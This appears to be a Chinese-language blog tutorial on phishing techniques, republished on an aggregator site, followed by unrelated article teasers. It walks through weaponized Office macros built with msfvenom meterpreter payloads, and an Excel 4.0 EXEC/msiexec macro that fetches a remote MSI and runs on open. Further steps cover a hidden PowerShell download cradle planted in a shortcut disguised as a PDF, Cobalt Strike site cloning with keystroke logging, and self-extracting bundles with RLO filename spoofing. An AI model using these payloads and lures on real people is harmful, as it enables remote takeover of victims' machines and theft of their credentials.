钓鱼的常见几种方式

news2024/11/26 14:35:08

钓鱼的多种方式

office钓鱼攻击

宏与宏病毒

# 宏
宏是office自带的一种高级脚本特性,通过VBA代码,可以在office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中一些任务自动化

# 宏病毒
宏病毒是一种寄存在文档或模板的宏中的计算机病毒,打开这中文档,其中的宏就会被执行,宏病毒被激活,转移到计算机上

docx钓鱼攻击

# word远程模板执行宏
利用word文档加载附加模板是的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏


# 攻击方法
1,创建两个不同的文件,第一个是启用宏的模板,或是.dotm文件,他将包含恶意VBA宏。

2,创建第一个文件,不包含恶意代码,但是有指向恶意模板文件的目标链接,即指向创建的第一个文件的链接
实践操作
  • 利用msf生成宏病毒
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -e x86/shikata-ga_nai -i 10 -f vba-exe   //会生成两端代码,macro的写在宏代码中 payload的写在word文档中

在这里插入图片描述

在这里插入图片描述

  • 创建一个word注入宏
创建word(.docm后缀的文件)-点击工具-宏编辑器

在这里插入图片描述

  • 将msf生成的宏(第一段代码 macro)插入代码中,保存并关闭

在这里插入图片描述

  • 将生成的payload复制到文档中

在这里插入图片描述

  • msf端使用监听ip以及端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.110.131
set LPORT 4444
run
打开docm文件,并且启用宏s
之后会弹出meterfer的shell

在这里插入图片描述

excel 宏

当把恶意的宏代码嵌入excel中,用户打开excel文件里的宏就会被触发

#攻击方法
1,使用msf生成hack.msi放到远程的服务器上

2,使用excel插入宏

3,将插入的宏隐藏
实践操作
  • msf生成excel宏
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -f msi -o hack.msi

在这里插入图片描述

  • 打开一个excel,右键点击sheet表格-插入-点击宏代码-在新建的宏表中插入宏代码

在这里插入图片描述

=EXEC("msiexec /q /i http://192.168.110.131:8000/hack.msi")   //调用执行服务器上的dayu.msi文件
=HALT()      //标识Excel 4.0宏结束,类似C语言return指令
//http://192.168.110.131:8000/hack.msi可以在vps中使用python -m http.server搭建一个网站

在这里插入图片描述

  • 将单元格设置为Auto_open

在这里插入图片描述

  • 将宏表进行隐藏

在这里插入图片描述

  • 保存为xslm文件

在这里插入图片描述

  • 受害主机点击此文件之后msf端会看到反弹的shell
    在这里插入图片描述

CHM电子书钓鱼

# CHM 已编译的帮助文件
html文件格式被压缩和重整以后,就被制成了这种二进制的。chm扩展文件格式。
.chm文件格式由压缩的html文件、图像、javascript这些文件组合而成,同时,他可能还带有超链接目录、索引以及全文检索功能。


# 电子书木马钓鱼优点
1.因为电子书一般是在本地电脑域打开的,所以获得的权限也是本地电脑域的权限
2。由于木马镶嵌再电子书中,所以一般的杀毒软件无法对其中存在的木马病毒进行检查和清除

# 攻击方法
1,编写恶意代码,制作钓鱼文件(可使用MyJSRat工具)
2,将恶意代码放在服务器上并且监听
3,制作带恶意代码的chm电子书(可使用Easy CHM)



lnk快捷方式钓鱼

# lnk文件
用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常他以快捷方式放在硬盘上,方便使用者快速的调用

# 攻击方法
1,使用cs进行web投递生成a脚本http://192.168.110.131:80/a

2.在桌面右键创建快捷方式
目标填写payload(例如:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"

cs生成payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"

3.为了让快捷方式伪装的像诱导文件,可以选择更改图标,并且更改文件名
实践操作
  • 使用cs生成一段ps脚本,意思为远程下载脚本并运行。主机访问后能直接运行,自动下载payload并上线

在这里插入图片描述

在这里插入图片描述

  • 创建快捷方式

在这里插入图片描述

  • 填写payload并保存为pdf
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"

cs生成的payload为
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"

填写的payload最好知名powershell的存在位置

在这里插入图片描述

  • 右键属性修改图标,图标文件可在**%SystemRoot%\System32\SHELL32.dll**中寻找

在这里插入图片描述

  • 点击文件之后上线成功

在这里插入图片描述

克隆网站钓鱼

克隆网站主要模仿相关网页的页面格式,与原网站类似,且域名相差不大,看到类似的网站一般情况下都会输入账号和密码,同时诱导受害人下载恶意文件,也可以劫持网页,记录键盘输入等操作

# 攻击方法
利用cs克隆网站

# 说明
有些网站可以克隆成功,但是不能得到用户输入的数据
实践操作
  • 使用cs克隆想要盗取的网站

在这里插入图片描述

  • 输入要克隆的网站,记得勾选在克隆的站点启用键盘记录

在这里插入图片描述

  • 访问生成的网站,并输入用户名密码

在这里插入图片描述

在这里插入图片描述

  • 在cs的视图-web日志可以看到网站的访问情况和输入的用户名和密码

在这里插入图片描述

在这里插入图片描述

自解压捆绑钓鱼

使用winrar将可执行文件和图片捆绑在一起并添加到压缩文件,创建自解压格式并设置解压后运行,在模式中选择隐藏
实践操作
  • 使用cs生成木马,并且将这个木马和图片放在一个文件夹中,选中这两个,右键添加到压缩文件
  • 进行自解压

在这里插入图片描述

  • 来到高级选项-自解压选项-修改解压路径

在这里插入图片描述

  • 在高级解压选项的设置中选择解压后运行,并设置木马的路径和图片路径(图片名最好简单一点 不要有空格 像我下面图片这样命名最后就解析失败了)

在这里插入图片描述

  • 在高级解压选项的模式中选择全部隐藏

在这里插入图片描述

  • 在高级解压选项的更新中选择以下选项

在这里插入图片描述

  • 将可执行文件的图标改为一张图片(需要将图片转为图标,后缀为.ico可利用在线网站),在高级解压选项的文本和图标中选择以下选项

在这里插入图片描述

  • 生成可执行文件

在这里插入图片描述

  • 运行执行文件会弹出图片
    在这里插入图片描述

  • 查看cs上线成功
    在这里插入图片描述

ets%2Fimage-20240821111536856.png&pos_id=img-wKkexOJ9-1724221495137)

  • 如果想要更逼真一点可以使用RLO
1.右键.exe文件重命名
2,重命名时再右键插入RLO
4,想要什么后缀,就将后缀名倒着写即可,例如word就是drow,png就是gnp

在这里插入图片描述

  • 改名后再次点击,仍然上线成功


在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2063179.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Qt实现圆型控件的三种方法之设置样式表

前言 最近在研究绘制各种形状的控件,这里专门挑出圆形的控件进行记录,其它形状的也大差不差,会了圆形的之后其它的也类似。 正文 这里我挑出Label来进行举例。 通过设置样式表 (QSS) 这种方法简单且适用于不需要自定义绘制的场景。就是要…

uniapp实现应用内检测版本更新(Android直接下载/ios跳转app store)

背景:最近需要给app加一个可以检测到新版本并更新的功能, 之前没有考虑过这个问题,第一次尝试,特此记录一下。 我在这里使用到了uniapp上的更新插件,并在此插件基础上进行更改以适应我的项目。 插件链接:ht…

【专题】2023-2024中国游戏企业研发竞争力报告合集PDF分享(附原数据表)

原文链接: https://tecdat.cn/?p37447 在当今的数字时代,游戏产业已然成为经济与文化领域中一股不可忽视的重要力量。2023 年,中国自研游戏市场更是呈现出一片繁荣且复杂的景象,实际销售收入达到了令人瞩目的 2563.8 亿元&#x…

计算机毕业设计选题推荐-民宿可视化分析-Python爬虫-随机森林算法

✨作者主页:IT毕设梦工厂✨ 个人简介:曾从事计算机专业培训教学,擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Py…

Catf1ag CTF Web(九)

前言 Catf1agCTF 是一个面向所有CTF(Capture The Flag)爱好者的综合训练平台,尤其适合新手学习和提升技能 。该平台由catf1ag团队打造,拥有超过200个原创题目,题目设计注重知识点的掌握,旨在帮助新手掌握C…

易趋产品升级 | EasyTrack11_V2.0功能更新合集

近日,易趋PPM(EasyTrack PPM)为了帮助企业全面提升数字化项目管理能力,完成了新一轮的产品升级,从【个人空间】、【项目组合管理】、【合同与外包管理】。除了以上三大功能模块之外,其他升级项暂略。 1.个人…

Ajax技术详解

Ajax简介 Ajax 即 "Asynchronous Javascript And XML"(异步 JavaScript 和 XML),是指一种创建交互式、快速动态应用的网页开发技术,无需重新加载整个网页的情况下,能够更新页面局部数据的技术。 为什么要使…

c++习题25-判断字符串是否回文

目录 一,题目 二,思路 三,代码 一,题目 描述 输入一个字符串,输出该字符串是否回文。回文是指顺读和倒读都一样的字符串。 输入描述 输入为一行字符串(字符串中没有空白字符,字符串长度不…

Linux文件属性和打包压缩详解

1、文件属性体系 1.1 文件系统概述 [rootyunwei /]# ls -lhi 总用量 72K3505 lrwxrwxrwx. 1 root root 7 3月 7 2019 bin -> usr/bin 262152 dr-xr-xr-x. 5 root root 4.0K 12月 19 16:00 boot 399635 drwxr-xr-x 2 root root 4.0K 11月 5 2019 data1026 drw…

【数据结构】二叉树基础知识

0. 前言 在前面几期博客,我们已经学习过了各种线性的数据结构,顺序表、链表、栈、队列, 本期博客我们一起来学习一种非线性的结构——树 1. 树的概念及结构 1.1 树的概念 树是一种非线性的数据结构,它是由n(n>…

学习嵌入式第二十九天

ipc进程间通信方式 PC,即进程间通信(Inter-Process Communication),是操作系统中不同进程之间交换数据的一种机制。以下是一些常见的IPC方式: 管道:用于父子进程或兄弟进程之间的通信。消息队列&#xff…

火绒一键修复所有dll缺失?教你快速修复dll错误问题

你的电脑是否遇到过dll文件缺失的状态?那么应该如何将dll文件进行修复,不知道大家有没有听过火绒和电脑dll修复工具一键修复所有的dll缺失?今天我们就来了解一下如何使用火绒和电脑dll修复工具修复电脑错误dll文件丢失的问题。 dll是什么&…

海南云亿商务咨询有限公司靠谱不?

在这个短视频与直播浪潮席卷而来的时代,抖音电商以其独特的魅力迅速崛起,成为无数商家争相入驻的新战场。作为这一领域的佼佼者,海南云亿商务咨询有限公司凭借其专业的服务、前瞻性的视野和实战型的策略,正引领着一批又一批的商家…

【C语言进阶】数据如何安家?C语言内存中的存储艺术深度解析

📝个人主页🌹:Eternity._ ⏩收录专栏⏪:C语言 “ 登神长阶 ” 🤡往期回顾🤡:C语言调试 🌹🌹期待您的关注 🌹🌹 ❀C语言数据在内存中的存储 &#…

如何应对突发技术故障和危机:开发团队的应急策略

开发团队如何应对突发的技术故障和危机? 在数字化时代,软件服务的稳定性对于企业至关重要。然而,即使是大型平台,如网易云音乐,也可能遇到突发的技术故障。网页端出现502 Bad Gateway 报错,且App也无法正常…

云计算day30

1. 配置⼀主⼆从mysql57 1. mycat对mysql8不完全⽀持 2. mysql8主从问题不⼤ get_pub_key1 1. gtids事务复制 2. 删除/etc/my.cnf 3. 同步data⽂件需要先停⽤mysql服务,删除data⽬录中的 auto.cnf 4. gtid模式以及经典模式都需要锁表 flush tables with rea…

6 - Linux PXE高效批量网络装机

目录 一、PXE概述 1.简介 2.优点 3.前提条件 二、搭建PXE远程安装服务器 三、实现Kickstart无人值守安装 一、PXE概述 1.简介 PXE(Preboot eXcution Environment)预启动执行环境,是由Intel公司开发的网络引导技术,工作在Cl…

工业4G路由器

设备概述 路由器是基于4G 技术研发的无线路由网关设备,除了具备传统路由器 的 VPN 、防火墙、 NAT 、 PPPoE 、 DHCP 等功能之外,还能支持 4G 无线拨号,提供最高可达 150Mbps 的无线高速带宽。路由器支持四个以太网接口,可更好…

招募活动投稿展示 | 感受科技温度,从一个 LLM 应用开始

活动介绍 谷歌开发者招募活动是专为 Google 技术的爱好者及开发者们开展的活动,旨在鼓励大家通过多种形式 (文章/视频/coding 等) 创作与 Google 技术相关的讲解分享、实践案例或活动感受等内容,展示代码、框架、平台在真实世界中的生动表现,…